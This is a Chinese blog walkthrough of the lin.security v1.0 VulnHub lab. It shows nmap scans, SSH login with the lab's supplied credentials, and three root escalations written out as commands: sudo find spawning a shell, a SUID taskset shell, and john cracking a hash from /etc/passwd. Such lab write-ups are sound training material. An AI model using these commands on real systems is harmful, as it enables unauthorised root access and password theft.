lin.security_v1.0打靶渗透

于 2024-07-28 22:26:55 发布
阅读量95 收藏 2
点赞数
文章标签: linux 网络 运维 web安全 网络安全 经验分享 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140757294
版权

一、信息收集:

1、扫描靶机的IP:

nmap 192.168.128.0/24

2、扫描靶机开放的端口:

nmap -p- 192.168.128.124

3、在下载靶机的时候,官网介绍里给了一个账号和密码:bob/secret

4、开放的端口中ssh服务,尝试账号密码连接:

5、查看用户权限,发现权限较低:

二、提权

1、使用sudu提权:

sudo find . -exec /bin/sh \; -quit

成功提权。

2、使用SUID提权:

(1)寻找suid文件:

find / -user root -perm -4000 -exec ls -ldb {} \;

找到一个taskset文件。

(2)使用taskset文件进行提权:

task 1 /bin/bash -p

成功提权。

3、通过/etc/passwd提权:

(1)查看/etc/passwd文件:

cat /etc/passwd

(2)发现有一个用户的密码是可以看见的,而且权限较高,尝试解密:

echo 'AzER3BZh6WZE' > hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/hash.txt

解密成功,密码应该是:P@ssw0rd

(3)尝试切换这个用户:

成功提权。

搬砖小星
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
in.security 提权靶场通关手册上篇
weixin_47767605的博客
05-17 1493
0x00 in.security靶场介绍 大家好,本期丹丹妹,给大家带来一个Linux 配置问题导致提权的靶场通关手册,也就是lin.security靶场。 lin.security靶场是一个基于Ubuntu(18.04 LTS)的Linux虚拟机,靶场提供许多权限提升的漏洞供我们练习关于linux权限的相关知识,下面是这个靶场的下载链接: https://in.security/downloads/lin.security_v1.0.ova。 这个是一个vmware的ova文件...
Mac4Lin_Install_v1.0.zip
12-15
《Mac4Lin_Install_v1.0:将Linux系统美化为Mac OS风格的详细指南》 在计算机领域,操作系统界面的美观与个性化始终是用户关注的焦点之一。Linux,作为一个高度可定制的操作系统,提供了丰富的自定义选项。"Mac4Lin...
[VulnHub靶机]Lin.Security_linux提权
qq_45927819的博客
03-15 2192
靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 靶机IP:192.168.56.106 直接ssh连接: ssh bob
渗透测试】Lin.Security靶机渗透练习_虚拟机无法获取ip的配置方法+靶机多种提权方式练习
serendipity1130的博客
09-06 1487
靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 环境配置: 1.因为直接开机的security靶机NAT连接,无法
Vulnhub靶机 Lin.security
菜浪马废的博客
04-27 248
给了登录账号 直接拿靶机登录 第一种方法 第二种方法
FSL_LIN_2.x_STACK_4.5.9.rar_FSL lin_lin_lin 2.2_lin 源码_飞思卡尔 lin
07-15
"FSL_LIN_2.x_STACK_4.5.9.rar_FSL lin_lin_lin 2.2_lin 源码_飞思卡尔 lin" 是一个与飞思卡尔LIN(Local Interconnect Network)协议栈相关的压缩包,主要用于LIN应用的开发和学习。LIN是一种低成本的串行通信协议...
FSL_LIN_2.X_STACK.zip_FSL_LIN_2.X_STACK_LIN代码_NXP LIN_lin 2.2_li
07-15
《NXP LIN 2.2 Stack:构建与理解》 NXP LIN 2.2 Stack 是一种基于Freescale Semiconductor(现为NXP Semiconductors)技术的 LIN(Local Interconnect Network)通信协议栈,它专为汽车电子系统中的低速通信设计。...
VMware-ovftool-4.4.1-16812187-lin.x86_64.bundle
06-22
VMware OVF Tool是一个命令行实用工具,允许您在许多VMware产品中导入和导出OVF包。
VMware-ovftool-4.3.0-13981069-lin.x86_64.bundle BUNDLE文件
最新发布
03-13
这个【描述】提到的是"VMware-ovftool-4.3.0-13981069-lin.x86_64.bundle BUNDLE文件[34.91MB].zip",这是一个针对Linux x86_64架构的VMware OVF Tool 4.3.0版本的压缩包,文件大小为34.91MB。"BUNDLE"通常指的是一...
VMware-ovftool-4.3.0-13981069-lin.x86_64.bundle
01-09
VMware-ovftool-4.3.0-13981069-lin.x86_64.bu Linux X86-64最新资源包
lin182正式版v1.5_involvedmeo_lin.182_lin182.com_lin182_4321_
10-04
V1.0 妖精学4系V1.1 修复不能快速回魔BUGV1.2 增强祝瑟烈火爆击V1.3 增加项链升级制作V1.4 增加戒指升级制作V1.5 增加五行召唤杖制作龙消弱回血(3000-500)增加3大副本
ggj.rar_admin_lin.asp
09-20
标题中的"ggj.rar_admin_lin.asp"表明这是一个与ASP编程相关的项目,可能是一个名为"ggj"的网站的后台管理部分,使用了".rar"压缩格式,并且涉及到一个名为"admin_lin.asp"的文件,这通常代表后台管理员的登录页面。...
Double_lin.zip_lin
09-22
在给定的压缩包文件"Double_lin.zip_lin"中,包含的资源是关于VC++实现的双链表功能,这将帮助我们了解如何在C++环境中操作双链表。下面我们将深入探讨双链表的基本概念、实现细节以及可能的应用场景。 双链表,...
sky_lin.rar_1000y_sky_汇编 lin
09-19
标题中的"sky_lin.rar_1000y_sky_汇编 lin"表明这是一个与汇编语言编程相关的资源包,由用户"sky"分享,并且可能与Linux操作系统有关。"1000y"可能是用户ID或者是年份的某种表示,但在这个上下文中具体含义不明。...
LIN协议相关.zip_LIN UDS_LIN_UDS_UDS LIN_lin 诊断_uds诊断
07-15
**LIN协议相关** LIN(Local Interconnect Network)协议是一种低成本的串行通信协议,用于汽车电子系统中的子网通信。它的设计目标是为了解决车辆内部简单设备间的通信需求,如车窗电机、座椅调节器等。LIN协议的...
LIN.rar_LIN控制芯片_LIN通讯_TMS320F28035_TMS320F28035 lin_lin
07-15
在本文中,我们将深入探讨与"LIN.rar_LIN控制芯片_LIN通讯_TMS320F28035_TMS320F28035 lin_lin"相关的主题,主要关注LIN(Local Interconnect Network)通信协议以及如何在TI的TMS320F28035微控制器上实现它。...
LIN.rar_LIN 例程_LIN通信_LIN通讯_lin通信是什么
07-15
lin通讯资料,详细介绍lin通讯规则和编程。 有例程分析。
FSL_LIN_2.x_STACK_Package_4.5.9.7z
06-22
《NXP芯片LIN通信开发详解》 在嵌入式系统设计中,LIN(Local Interconnect Network)总线是一种广泛应用的串行通信协议,主要用于汽车电子系统。本资源包"**FSL_LIN_2.x_STACK_Package_4.5.9.7z**"专门针对NXP系列...
lin_reg.intercept_, lin_reg.coef_
05-12
`lin_reg.intercept_` 是线性回归模型的截距(intercept),`lin_reg.coef_` 是线性回归模型的系数(coefficient),可以用于计算预测值。假设线性回归模型为: $y = b + w_1x_1 + w_2x_2 + ... + w_nx_n$ 其中 $y$ 是因变量,$x_1, x_2, ..., x_n$ 是自变量,$b$ 是截距,$w_1, w_2, ..., w_n$ 是系数。则预测值为: $\hat{y} = b + w_1x_1 + w_2x_2 + ... + w_nx_n$ 其中,$\hat{y}$ 表示预测值。可以使用 `lin_reg.intercept_` 和 `lin_reg.coef_` 计算预测值。例如,如果想要预测 $x_1=2, x_2=3, x_3=4$ 时的 $y$ 值,可以使用以下代码: ```python import numpy as np # 假设 lin_reg 是训练好的线性回归模型 x = np.array([2, 3, 4]).reshape(1, -1) y_pred = lin_reg.intercept_ + np.sum(lin_reg.coef_ * x) ``` 其中,`x` 是一个形状为 `(1, 3)` 的数组,表示要预测的自变量的取值。使用 `np.sum` 函数对 `lin_reg.coef_ * x` 进行求和,得到预测值 `y_pred`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值